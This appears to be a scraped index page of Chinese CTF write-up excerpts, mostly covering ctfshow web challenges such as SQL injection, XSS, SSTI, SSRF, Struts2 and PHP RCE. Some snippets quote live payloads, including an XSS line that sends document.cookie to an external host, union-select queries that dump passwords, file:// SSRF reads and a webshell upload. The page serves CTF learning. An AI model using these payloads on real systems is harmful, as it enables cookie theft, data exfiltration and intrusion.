WriteUp:CTFshow

CTFSHOW-PHP特性

WEB89题目://里面的一般默认加引号,数字可以不用区别,但是字符串需要不然会报错但是不影响运行例如Warning:Useofundefinedconstantb-assumed'b'(thiswillthrowanErrorinafutureversionofPHP)in/Applications/phpstudy/WWW/test.phponline5string(3)"xxx"string
_Monica_·2023-11-23 05:15

一些RCE的汇总

RCE自增RCE参考[CTFshow-RCE极限大挑战官方wp]RCE-1[过滤.(]RCE-2p[自增-Array]RCE-3[自增-NAN-过滤了(和.
有点水啊·2023-11-23 05:41

【Web】preg_match绕过相关例题wp

目录①[FBCTF2019]rceservice②[ctfshow]web130③[ctfshow]web131④[NISACTF2022]middlerce简单回顾一下基础参考文章p牛神文preg_match
Z3r4y·2023-11-23 04:32

新Bugku——Simple_SSTI_1——web

网上有很多的writeup,但我决定也写个,所以作为菜鸟的我如果有什么错的,希望大佬们喷轻点,先谢谢了好了回到题目里,首先打开是要求我们传一个参数flag进去我们打开源代码看一下(F12或ctrl+u)
来碗面加个小孩·2023-11-22 19:18

CTFSHOW】web入门 SSTI(更新中)

文章目录引言web361web362web363参考资料引言刷完SSRF、XSS,来学学SSTIweb361首先测试出get的参数名为:name。记得之前刷题时保存过一张大佬总结的测试流程图:根据图片规则进行测试:?name={{1*'4'}}返回结果:4则题目考察的很有可能是基于Jinja2的flask框架。payload:对于python3:(题目使用的是python3)使用popen函数:?
TurkeyMan·2023-11-22 15:16

ctfshow刷题 [struts2]

目录一、Web279-S2-001二、Web280--S2-005三、Web281--s2-008四、Web301-代码审计五、Web302-代码审计六、Web303-代码审计七:网鼎杯:朱雀组开启靶机八、Xss九、Web78文件包含一、Web279-S2-001题目分析:如题s2-001是一个struts2命令执行漏洞编号一、判断网站是否基于Struts2的方法1、通过网页后缀来判断,如.do.
路向阳_·2023-11-22 15:46

【Web】Ctfshow Nodejs刷题记录

①web334②web335③web336④web337⑤web338⑥web339⑦web340⑧web341⑨web342-343⑩web344①web334进来是一个登录界面下载附件,简单代码审计表单传ctfshow123456
Z3r4y·2023-11-22 15:13

ctfshow XSS刷题总结

简介这次把爪牙伸到了xss嘿嘿嘿开始日咯!web316用xss平台怎么也爆不出。。。可能是姿势不对用最原始的方法吧在自己的服务器上写一个hack.phpdocument.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookieweb317今天学习了一款xss自动扫描的工具XSStrike似乎很好用的呢直接跑出
b1ue0cean·2023-11-22 15:42

CTFSHOW XSS漏洞

目录准备工作第316-333关详细说明316关317关318关319关320关-326关327关328关329关330关331关332-333关准备工作关于这个平台:CTFSHOW的XSS平台是这样的你每次提交后
貌美不及玲珑心,贤妻扶我青云志·2023-11-22 15:42

ctfshow-xss

316-326反射型期间有过滤script、img、空格、iframe的,不一一赘述,以下payload通316-326。存储型327因为要的是管理员cookie,收件人猜测填写admin,在邮件内容插入payload328管理员登录时,会看到所有用户的用户名和密码,只要注册一个带有xss代码的用户即可,当管理员访问该页面,就会执行在密码或者用户名插入payload都行,网站没有验证输入合法性。获
Vin0sen·2023-11-22 15:38

【Web】Ctfshow XSS刷题记录

目录反射型XSS①web316②web317-319③web320-322④web323-326存储型XSS①web327②web328③web329④web330⑤web331⑥web332-333反射型XSS①web316直接输入alert(1),能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。payload:wi
Z3r4y·2023-11-22 14:05

SWPU新生赛2021 Reverse部分WriteUp

我真没想到第一波我做re比misc多。。第一波放题简单的逻辑这个题缺条件,结果太多,初步晃一眼,如果不给个大概范围,能输出的结果应该是几万~几十万。当然因为做了其他的题,了解到“简单”系列基本都是大写,于是才做出来的。题目如下flag='xxxxxxxxxxxxxxxxxx'flag=flag[::-1]result=0foriinrange(0,len(flag)-1):s1=ord(flag[
是Mumuzi·2023-11-22 09:20

SquareCTF-2023 Web Writeups

官方wp:CTFtime.org/SquareCTF2023tasksandwriteupssandboxDescription:I“made”“a”“python”“sandbox”“”“”nc184.72.87.98008
Jay 17·2023-11-22 04:37

ctfshow 摆烂杯web wp

考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题文章目录web签到黑客网站一行代码web签到题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破
Lum1n0us·2023-11-21 13:29

ctfshow终极考核wp

web640web641web642web643web644web645web646web647web648web649web650web651web652web653web654web640打开页面就能看到flagctfshow{060ae7a27d203604baeb125f939570ef}web641抓取首页的包,看到有一个Flag字段ctfshow
Lum1n0us·2023-11-21 13:29

BUUCTF笔记之Misc系列部分WriteUp(二)

1.爱因斯坦binwalk分离出一个压缩包。查看图片备注:解压得到flag。2.easycap追踪TCP流:3.另外一个世界binwalk和steg一无所获,图片备注也看了没有收获,winhex看看:复制出来转字符串得到:4.隐藏的钥匙路飞一行人千辛万苦来到了伟大航道的终点,找到了传说中的Onepiece,但是需要钥匙才能打开OnePiece大门,钥匙就隐藏在下面的图片中,聪明的你能帮路飞拿到钥匙
KogRow·2023-11-21 10:02

CTFHub-Web-Web前置技能 WriteUp

HTTP协议一、请求方式  1.题目内容  2.解题思路  根据题目内容描述,我们需要使用CTFHUB方法访问该网址,直接使用浏览器F12开发者工具对请求进行修改并重发。  3.解题过程  根据解题思路,修改请求方式为CTFHUB  查看响应,CaptureTheFlag!二、302跳转  1.题目内容  2.解题思路  点击该链接,使用burpsuite抓包  3.解题过程  抓到包后repea
曾小健_0532·2023-11-21 09:36

2022年农信银网络安全竞赛3-2 ez_raw简单取证writeup

下载解压ez_raw,根据题意判断文件应为内存镜像,用volatility工具分析。1、扫描cmd命令行获得一串base64字符串volatility-f.\ez_raw--profile=Win7SP1x64cmdscan5oiR5Zyo5rWP6KeI5Zmo5LiK5LiL6L2955qE5Lic6KW/5om+5LiN5Yiw5LqG77yM6L+Z56C055S16ISR6buY6K6k
陈征·2023-11-20 22:03

【Web】Ctfshow SSTI刷题记录1

目录①web361362-无过滤②web363-过滤单双引号③web364-过滤单双引号和args④web365-过滤中括号[]、单双引号、args⑤web366-过滤单双引号、args、中括号[]、下划线⑦web367-过滤单双引号、args、中括号[]、下划线、os⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{⑨web369-过滤单双引号、args、中括号[]、下划线、
Z3r4y·2023-11-19 23:19

【Web】Ctfshow SSRF刷题记录1

核心代码解读curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取内容curl_close():会话关闭①web351post:url=http://127.0.0.1/flag.php或者url=file:///var/www/html/flag.php查看源码②web352-353前置知识:127.1会被解析成127.0.0.
Z3r4y·2023-11-19 15:02

【Web】文件包含+php伪协议例题wp

目录①[SWPUCTF2021新生赛]include②[SWPUCTF2021新生赛]PseudoProtocols③[BSidesCF2020]Hadabadday④文件包含一些姿势(摘自ctfshow
Z3r4y·2023-11-19 15:01

ctf PHP一句话木马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...

CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍一下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,
Byte DIY·2023-11-19 06:57

第六届浙江省大学生网络与信息安全竞赛 2023年 初赛/决赛 WEB方向 Writeup

-------------------【初赛】-------------------easyphp简单反序列化__debuginfo()魔术方法打印所需调试信息,反序列化时候执行!链子如下:BBB::__debuginfo()->CCC::__toString()->AAA::__call()EXP:cmd);return"done";}}classBBB{public$param1;public
Jay 17·2023-11-19 03:22

靶场Writeup(四) | 反序列化、命令执行、Tomcat、域渗透等漏洞组合到攻克域控

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-11-18 22:09

实战ATT&CK攻击链路--靶场Writeup(三)

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-11-18 22:39

CTFshow-PWN入门-前置基础-全篇

本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDAPro、exeinfope参考博客:T1ngSh0w的博客ctfshowpwn入门|雲流のLowestWorld
Jugg_xie·2023-11-17 05:32

[SUCTF 2019]EasySQL 1 Writeup(超级详细)

本文章是该系列的第三篇,同样涉及到基础sql注入原理。首先我们能看到的就是一个输入框,直接告诉了你注入点。做了一些简单的测试,直接过滤了from、union、extractvalue、PREPARE等关键字,回显提示:NONONO!前面的那道sql我还是讲的比较中规中矩,这道sql骚一点。先讲讲我的第一种玩法:首先手工盲注嘛,会发现连sleep等都全部过滤掉了,而且你输入数字的时候回显是:Arra
StevenOnesir·2023-11-17 01:28

newstarctf 2023 week2

官方wpNewStarCTF2023Week2官方WriteUpweb游戏高手控制台将gameScore=10000000flag{42643d45-9b46-40ae-b7b3-f7c3d4542d72
一个俗人纳·2023-11-16 14:24

NewStarCTF 2023 公开赛道 Week3

官方WPhttps://shimo.im/docs/QPMRxzGktzsZnzhz/readNewStarCTF2023Week3官方WriteUp.htmlCryptoRabin’sRSA参考博客:
Fab1an·2023-11-16 14:27

第十六届全国大学生信息安全竞赛 ——创新实践能力赛线上初赛------WP

相关wp链接:第十六届全国大学生信息安全竞赛初赛WriteupbyX1cT34m|小绿草信息安全实验室2023全国大学生信息安全竞赛AGCTF战队WP-腾讯云开发者社区-腾讯云2023年第十六届全国大学生信息安全竞赛能力赛部分
访白鹿·2023-11-16 14:50

CTF writeup:tomcat上传webshell后门

做了ZJUschool-bus的一个题目,给了链接,***:**,在IP加端口后面写入manager/html跳出让你输密码,网上找个弱口令尝试的py文件很快就可以解出来。tomcat:tomcat。后面进去了网站要往上传个后门,找了好多地方没找到后门,自己写暂时水平不够,后来终于找到了一个。https://scoperchiatore.wordpress.com/my-webshell/成功进入
samohyes·2023-11-16 09:02

第十五届全国大学生信息安全竞赛(ciscn初赛) 部分writeup

杂项的附件地址:https://share.weiyun.com/BZyngGSZCISCNwebEzpopmisceverlasting_nightez_usb问卷调查pwnlogin-nomalcrypto签到电台基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3webEzpopthinphp6.0.12LST反序列化链,www.zip给源码,test路由里面a参数反序列化利用链
z.volcano·2023-11-15 23:16

第十五届全国大学生信息安全竞赛部分WriteUp

理论题算上变一千五百多名,华东南二百多名,进不去了,WriteUp也不想上传了。
Tajang·2023-11-15 23:14

ctfshow SQL注入专题

哦对了,这篇文章还没写完,更新中...emmm又是好久没更新了...之后就在这里做个记录吧,有些新的思路可以做些分享web174看了一下,应该是有数字或者username=flag就不输出,主要是这个数字的限制有点烦,flag里面肯定是有数字的...网上的wp很多用的布尔盲注,不过我当时还是想直接注出来,还是有办法的。参考前面几道题,可以使用to_base64函数,对于一个字符而言,不管是数字还是
yink12138·2023-11-15 07:39

ctfshow刷题日记sql注入篇

web171没有任何过滤那应该在这张表里面,直接用1'or'1'='1即可拿到表单的所有信息(也可以直接查询)web172添加了限制条件,上面的不能用了,还是单引号闭合,直接联合查询最终payload:-1'unionselect1,(selectpasswordfromctfshow_user2whereusername=flag);--+或者直接爆他所有的内容。-1'unionselect1,
Yan9.·2023-11-15 07:39

ctfshow web入门 sql注入

无过滤注入web171查询语句$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号闭合,未做任何过滤payload:1'unionselect1,group_concat(table_name),3frominformation_schema.tableswhere
S1nJa·2023-11-15 07:08

ctfshow web 入门 sql注入

171、常规题型(需要把前面数字换为-1,注释用--+)查数据库payload=“-1’unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()--+”查列名payload="-1’unionselect1,2,group_concat(column_name)f
放空 123·2023-11-15 07:08

ctfshow web入门 sql注入(持续更新)

文章目录web171web172web173web174web175web176web177web178web179web180-182web183web184web185-186web187web188web189web191web199-200web201web202web171第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。1'orderby3----1'unionselect1,2
Lum1n0us·2023-11-15 07:07

ctfshow web入门 sql注入wp(未完)

目录web171题目源码解题思路Payloadweb172题目源码解题思路Payloadweb173题目源码解题思路Payloadweb174题目源码解题思路PayloadEXPweb175题目源码解题思路Payloadweb176题目源码解题思路Payloadweb177题目源码解题思路Payloadweb178题目源码解题思路Payloadweb179题目源码解题思路Payloadweb180
久而不念·2023-11-15 07:07

CTFSHOW web入门 sql注入 无过滤注入 web171-175

目录web171web172web173web174web175web171select查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";尝试万能密码id=1'or'1'='1,进行查询,发现查询结果是数据库中全部内容,成功获得
起名字怎么这么难·2023-11-15 07:35

ctfshow web入门 sql注入(超详解)201-250

web201查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."';";返回逻辑//对传入的参数进行了过滤functionwaf($str){//代码过于简单,不宜展示}需要学会:使用--user-agent指定agent--u
Yn8rt·2023-11-15 06:33

[CTFSHOW][WEB入门] SQL注入

web171参数类型字符型SQL语句SELECT注入方式回显注入查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."'limit1;";#确定回显列数-1'unionselectNULL,NULL,NULL--+#查询当前数据库
fallingskies22·2023-11-15 06:03

ctfshow-web入门-sql

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档ctfshow-web入门-sql题目一、web171二、web172三、web173四、web174五、web175六、web176七、
林本·2023-11-15 06:03

ctfshow web入门174

题目给出了查询语句和返回逻辑先看查询语句$sql="selectusername,passwordfromctfshow_user4whereusername!='flag'andid='".$_GET['id']."'limit1;";这里能直接看出来是使用单引号进行绕过是一个字符型注入继续,查看返回逻辑if(!preg_match('/flag|[0-9]/i',json_encode($re
Jt2312·2023-11-15 06:31

ctfshow学习记录-web入门(sql注入171-180)

目录web171web172web173web174web175web176web177web178web179web180web171解答:打开页面,提供了sql语句源码,是单引号闭合。这里可以用1'and'1'='1和1'and'1'='2测试一下闭合。1'and'1'='1正常显示,1'and'1'='2不正常显示。单引号完全闭合,且不过滤空格,and等。确定列数,同时确定可回显位置,经过测
九枕·2023-11-15 06:30

ctfshow web入门 sql注入做题记录

ctfshowweb入门sql注入前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshowsql注入sql注入的产生:php中对数据库的操作非常简化
AshMOB·2023-11-15 06:29

ctfshow sql入门174 175脚本

因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下174布尔盲注这是不使用二分法的importrequestsurl='http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php'flag=''foriinrange(60):forjinrange(32,128):payl
木…·2023-11-15 06:55

ctfshow-184 sql注入

已知条件:flag格式:ctfshow{这个字符开头。好多wp和官方视频没有解释为什么要使用$user_count=43,来做判断条件,基本不好的小白就很难受了。
yxlr_beta·2023-11-14 20:49

ctf php sql注入,CTFshow-WEB入门-SQL注入(下)(持续更新)

web227按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。
itwebber·2023-11-14 20:46

CTFshow-WEB入门-SQL注入(上)

web171无任何过滤,直接注就完事了。'unionselect1,2,group_concat(password)fromctfshow_user---web172'unionselect1,group_concat(password)fromctfshow_user2--+web173'unionselect1,2,group_concat(password)fromctfshow_user3
bfengj·2023-11-14 20:44
上一页 3 4 5 6 7 8 9 10 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他